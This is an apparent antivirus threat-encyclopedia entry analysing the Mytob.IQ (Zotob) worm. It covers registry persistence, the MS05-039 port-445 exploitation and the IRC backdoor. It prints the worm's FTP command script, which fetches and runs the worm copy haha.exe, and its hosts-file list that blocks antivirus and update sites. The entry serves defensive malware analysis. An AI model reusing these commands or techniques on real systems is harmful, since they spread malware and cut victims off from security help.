Threat Encyclopedia

Selected viruses, spyware, and other threats: sorted alphabetically

Win32/Mytob.IQ

   
Aliases: W32/Zotob.A, W32/Zotob.worm, Zotob.A, Zotob-A
Type: Worm
Affect: Windows 2000

Mytob.IQ is a 22528 byte worm that is runtime packed by UPack. Upon execution, the worm copies itself into the System32 folder as "botzor.exe".
The worm creates a mutex "B-O-T-Z-O-R" to avoid multiple running instances of the worm on one machine.

The worm adds the following registry key to the registry to make sure that it runs every time windows is started:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
"WINDOWS SYSTEM" = "botzor.exe"

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
"WINDOWS SYSTEM" = "botzor.exe"

Note: The worm watches continuously for the presence of these registry keys and recreates them if they are not present anymore.

MyTob.IQ also modifies the following registry key:

HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess
"Start" = "4"

Changing this key lowers security settings on the compromised system.

Note: This will disable the Shared Access on Windows NT based systems.

The worm generates random IP addresses and attempts to connect on port 445 of the generated IP's to exploit the Plug and Play buffer overflow vulnerability [see MS05-039 at http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx]. If the vulnerability exploit is successful, it executes code (shellcode) on the target machine, which instructs it to connect back to the source in order to retrieve a copy of the worm. (This copy is uploaded to the target machine by the created FTP Server-Connection using 2pac.txt FTP-Commands file)

Note: The worm creates a task "SCAN" for this purpose.

The 2pac.txt file contains the following ftp commands:

open %IP% %TCP port%
user hell rulez
binary
get haha.exe
quit

The worm executes FTP.EXE locally on the compromised system to retrieve a copy of the worm with the name "haha.exe" from the connecting system, and starts this file after downloading.

Note: The FTP Server is using port 33333

The worm attempts to overwrite the hosts file with the following data to prevent access to these sites:

127.0.0.1 www.symantec.com
127.0.0.1 securityresponse.symantec.com
127.0.0.1 symantec.com
127.0.0.1 www.sophos.com
127.0.0.1 sophos.com
127.0.0.1 www.mcafee.com
127.0.0.1 mcafee.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 www.viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 f-secure.com
127.0.0.1 www.f-secure.com
127.0.0.1 kaspersky.com
127.0.0.1 kaspersky-labs.com
127.0.0.1 www.avp.com
127.0.0.1 www.kaspersky.com
127.0.0.1 avp.com
127.0.0.1 www.networkassociates.com
127.0.0.1 networkassociates.com
127.0.0.1 www.ca.com
127.0.0.1 ca.com
127.0.0.1 mast.mcafee.com
127.0.0.1 my-etrust.com
127.0.0.1 www.my-etrust.com
127.0.0.1 download.mcafee.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 secure.nai.com
127.0.0.1 nai.com
127.0.0.1 www.nai.com
127.0.0.1 update.symantec.com
127.0.0.1 updates.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 customer.symantec.com
127.0.0.1 rads.mcafee.com
127.0.0.1 trendmicro.com
127.0.0.1 pandasoftware.com
127.0.0.1 www.pandasoftware.com
127.0.0.1 www.trendmicro.com
127.0.0.1 www.grisoft.com
127.0.0.1 www.microsoft.com
127.0.0.1 microsoft.com
127.0.0.1 www.virustotal.com
127.0.0.1 virustotal.com
127.0.0.1 www.amazon.com
127.0.0.1 www.amazon.co.uk
127.0.0.1 www.amazon.ca
127.0.0.1 www.amazon.fr
127.0.0.1 www.paypal.com
127.0.0.1 paypal.com
127.0.0.1 moneybookers.com
127.0.0.1 www.moneybookers.com
127.0.0.1 www.ebay.com
127.0.0.1 ebay.com

The worm also provides IRC-Backdoor functionality with the following functions:

Downloading files
Downloading new worm updates
Executing files
Providing uptime information to the remote controller
Providing information about the worm variant to the remote controller
Notifying IRC Channels/Operator via private message
Restarting the computer
Providing FTP Server Access on the compromised system
Removing components

The worm contains the following text:

.... Made By .... Greetz to good friend ..... Based On ....
MSG to avs: the first av who detect this worm will be the first killed in the next 24hours!!!

It tries to connect to the irc server diabl0.turkcoders.net.

History: Analysis and Write-up by: Michael St. Neitzel